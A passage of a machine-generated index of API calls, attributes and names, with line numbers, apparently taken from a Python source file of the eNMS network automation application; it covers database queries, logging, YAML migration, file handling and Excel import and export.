"flask_login.current_user.name", "line_number": 587, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 587, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 591, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 591, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log_queue", "line_number": 599, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 599, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 603, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 603, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 615, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 615, "usage_type": "name"}, {"api_name": "eNMS.database.db.rbac_error", "line_number": 617, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 617, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 618, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 618, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 619, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 619, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 622, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 622, "usage_type": "name"}, {"api_name": "flask_login.current_user.name", "line_number": 622, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 622, "usage_type": "name"}, {"api_name": "operator.attrgetter", "line_number": 626, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 628, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 628, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 633, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 633, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.automation", "line_number": 638, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 638, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.automation", "line_number": 639, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 639, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 658, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 658, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 661, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 661, "usage_type": "name"}, {"api_name": "eNMS.database.db.rbac_error", "line_number": 663, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 663, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 668, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 668, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 674, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 675, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 675, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 677, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 677, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.expression.true", "line_number": 677, "usage_type": "call"}, {"api_name": "eNMS.database.db.query", "line_number": 680, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 680, "usage_type": "name"}, {"api_name": "sqlalchemy.or_", "line_number": 680, "usage_type": "call"}, {"api_name": "eNMS.environment.env.log", "line_number": 687, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 687, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 688, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 688, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 689, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 691, "usage_type": "call"}, {"api_name": "eNMS.database.db.session.query", "line_number": 694, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 694, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 694, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 694, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 694, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 695, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 695, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 699, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 707, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 707, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 711, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 711, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 712, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 712, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 713, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 713, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 713, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 714, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 714, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 717, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 717, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 718, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 718, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 719, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 719, "usage_type": "name"}, {"api_name": "sqlalchemy.or_", "line_number": 719, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 723, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 723, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 724, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 724, "usage_type": "name"}, {"api_name": "operator.itemgetter", "line_number": 750, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 759, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 759, "usage_type": "name"}, {"api_name": "operator.itemgetter", "line_number": 809, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 824, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 839, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 858, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 858, "usage_type": "name"}, {"api_name": "operator.itemgetter", "line_number": 861, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 873, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 873, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 900, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 900, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 904, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 904, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 904, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 911, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.migration_path", "line_number": 911, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 911, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 912, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 913, "usage_type": "call"}, {"api_name": "ruamel.yaml.dump", "line_number": 915, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 915, "usage_type": "name"}, {"api_name": "eNMS.database.db.export", "line_number": 916, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 916, "usage_type": "name"}, {"api_name": "ruamel.yaml.dump", "line_number": 924, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 924, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.server_version", "line_number": 926, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 926, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 927, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 927, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 933, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 933, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log_events", "line_number": 934, "usage_type": "attribute"}, {"api_name": "eNMS.environment.env", "line_number": 934, "usage_type": "name"}, {"api_name": "eNMS.database.db.delete_all", "line_number": 939, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 939, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 940, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 941, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 941, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 943, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.migration_path", "line_number": 943, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 943, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 945, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 945, "usage_type": "name"}, {"api_name": "ruamel.yaml.load", "line_number": 948, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 948, "usage_type": "name"}, {"api_name": "ruamel.yaml.SafeLoader", "line_number": 948, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs.server_version", "line_number": 949, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 949, "usage_type": "name"}, {"api_name": "flask_login.current_user", "line_number": 951, "usage_type": "name"}, {"api_name": "flask_login.current_user.name", "line_number": 952, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 952, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 954, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 954, "usage_type": "name"}, {"api_name": "ruamel.yaml.load", "line_number": 967, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 967, "usage_type": "name"}, {"api_name": "ruamel.yaml.CLoader", "line_number": 967, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 968, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 968, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 969, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 969, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.relationships", "line_number": 972, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 972, "usage_type": "name"}, {"api_name": "eNMS.environment.env.get_password", "line_number": 975, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 975, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.private_properties_set", "line_number": 977, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 977, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 983, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 983, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 1001, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 1001, "usage_type": "call"}, {"api_name": "eNMS.database.db.session.rollback", "line_number": 1003, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1003, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1003, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1006, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1006, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1006, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1007, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1007, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1008, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1008, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1010, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1010, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1011, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1011, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.relationships", "line_number": 1016, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1016, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1021, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1021, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1030, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1030, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 1039, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 1039, "usage_type": "call"}, {"api_name": "eNMS.database.db.session.rollback", "line_number": 1041, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1041, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1041, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1044, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1044, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1044, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1044, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1045, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1045, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1045, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1051, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1051, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1052, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1052, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1056, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1056, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1056, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1056, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1058, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1058, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1059, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1059, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1062, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1062, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1062, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1062, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1063, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1063, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1063, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log_events", "line_number": 1064, "usage_type": "attribute"}, {"api_name": "eNMS.environment.env", "line_number": 1064, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1065, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1065, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1065, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1065, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1069, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1069, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 1070, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1070, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 1072, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1090, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1090, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1091, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1091, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 1093, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1094, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1094, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 1104, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1104, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1104, "usage_type": "name"}, {"api_name": "eNMS.database.db.delete_all", "line_number": 1112, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1112, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 1114, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.relationships", "line_number": 1118, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1118, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1123, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1123, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1127, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1127, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1133, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1133, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1134, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1134, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 1144, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1144, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.query", "line_number": 1151, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1151, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1151, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1151, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1151, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1152, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1152, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1155, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1155, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1155, "usage_type": "name"}, {"api_name": "threading.current_thread", "line_number": 1160, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.model_properties", "line_number": 1163, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1163, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.relationships", "line_number": 1163, "usage_type": "attribute"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1168, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1168, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1175, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1175, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.get_time", "line_number": 1187, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 1187, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 1188, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1188, "usage_type": "name"}, {"api_name": "dramatiq.actor", "line_number": 1158, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 1195, "usage_type": "call"}, {"api_name": "contextlib.redirect_stdout", "line_number": 1196, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1202, "usage_type": "name"}, {"api_name": "eNMS.database.db", "line_number": 1203, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1204, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1204, "usage_type": "name"}, {"api_name": "eNMS.variables.vs", "line_number": 1205, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 1209, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.server_data", "line_number": 1213, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1213, "usage_type": "name"}, {"api_name": "flask_login.current_user", "line_number": 1222, "usage_type": "argument"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1223, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1223, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.get_time", "line_number": 1227, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 1227, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1229, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1229, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1232, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1232, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 1235, "usage_type": "call"}, {"api_name": "flask_login.current_user.name", "line_number": 1242, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 1242, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1254, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1254, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1256, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1256, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.get_time", "line_number": 1260, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 1260, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1261, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1261, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1268, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1268, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1275, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1275, "usage_type": "name"}, {"api_name": "flask_login.current_user.authentication", "line_number": 1276, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 1276, "usage_type": "name"}, {"api_name": "flask_login.current_user.update", "line_number": 1278, "usage_type": "call"}, {"api_name": "flask_login.current_user", "line_number": 1278, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1281, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1281, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.template_context", "line_number": 1281, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs.path", "line_number": 1283, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1283, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 1284, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1287, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1287, "usage_type": "name"}, {"api_name": "ipaddress.IPv4Network", "line_number": 1288, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1288, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1288, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 1290, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1292, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1292, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1294, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1294, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 1296, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1296, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.playbook_path", "line_number": 1303, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1303, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 1304, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.playbook_path", "line_number": 1304, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1304, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1318, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1318, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.aliased", "line_number": 1323, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1323, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1323, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 1326, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1326, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1327, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1327, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1335, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1335, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1336, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1336, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1348, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1348, "usage_type": "name"}, {"api_name": "eNMS.environment.env.redis_queue", "line_number": 1350, "usage_type": "attribute"}, {"api_name": "eNMS.environment.env", "line_number": 1350, "usage_type": "name"}, {"api_name": "eNMS.environment.env.redis", "line_number": 1351, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1351, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.run_stop", "line_number": 1353, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1353, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1357, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1357, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1361, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1361, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1364, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1364, "usage_type": "name"}, {"api_name": "xlwt.Workbook", "line_number": 1367, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.model_properties", "line_number": 1373, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1373, "usage_type": "name"}, {"api_name": "eNMS.database.db.dont_migrate", "line_number": 1374, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1374, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 1377, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1377, "usage_type": "name"}, {"api_name": "eNMS.environment.env.decrypt", "line_number": 1380, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1380, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1382, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1382, "usage_type": "name"}, {"api_name": "xlrd.open_workbook", "line_number": 1385, "usage_type": "call"}, {"api_name": "xlrd.biffh.XLRDError", "line_number": 1390, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.model_properties", "line_number": 1398, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1398, "usage_type": "name"}, {"api_name": "eNMS.database.db.field_conversion", "line_number": 1399, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1399, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 1402, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1402, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 1404, "usage_type": "call"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1406, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1406, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1406, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 1407, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1407, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1409, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1409, "usage_type": "name"}, {"api_name": "flask_login.current_user", "line_number": 1419, "usage_type": "argument"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1424, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1424, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 1425, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1425, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1427, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1427, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.flush", "line_number": 1428, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1428, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1428, "usage_type": "name"}, {"api_name": "eNMS.database.db.rbac_error", "line_number": 1430, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1430, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.rollback", "line_number": 1433, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1433, 